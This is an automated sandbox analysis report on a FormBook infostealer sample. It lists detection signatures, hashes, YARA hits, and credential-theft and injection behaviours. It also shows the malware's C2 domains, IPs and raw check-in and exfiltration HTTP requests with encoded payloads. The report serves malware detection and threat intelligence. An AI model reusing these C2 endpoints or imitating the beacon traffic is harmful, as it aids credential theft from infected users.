Windows Analysis Report
qHpeBvr9cR.exe

Overview

General Information

Sample Name: qHpeBvr9cR.exe
Analysis ID: 756313
MD5: f5bea76ffac05afbe19274595801184e
SHA1: 93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
SHA256: 40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
Tags: 32exeFormbooktrojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: qHpeBvr9cR.exe ReversingLabs: Detection: 41%
Source: qHpeBvr9cR.exe Virustotal: Detection: 36% Perma Link
Yara detected FormBook
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X Avira URL Cloud: Label: malware
Source: www.brennancorps.info/henz/ Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.lyonfinancialusa.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.afterdarksocial.club/henz/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: eufidelizo.com Virustotal: Detection: 8% Perma Link
Source: www.eufidelizo.com Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe ReversingLabs: Detection: 20%
Machine Learning detection for sample
Source: qHpeBvr9cR.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Joe Sandbox ML: detected
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
Uses 32bit PE files
Source: qHpeBvr9cR.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25293 FindFirstFileExW, 1_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00B25347
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25293 FindFirstFileExW, 2_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00B25347

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.brennancorps.info/henz/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.185.217.47 192.185.217.47
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 43 78 53 33 28 64 77 2d 6c 4b 73 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jCxS3(dw-lKsshGSVcA).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 70 30 37 32 47 35 4c 44 57 56 55 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63ip072G5LDWVUDNF~GIA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:48 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:50 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 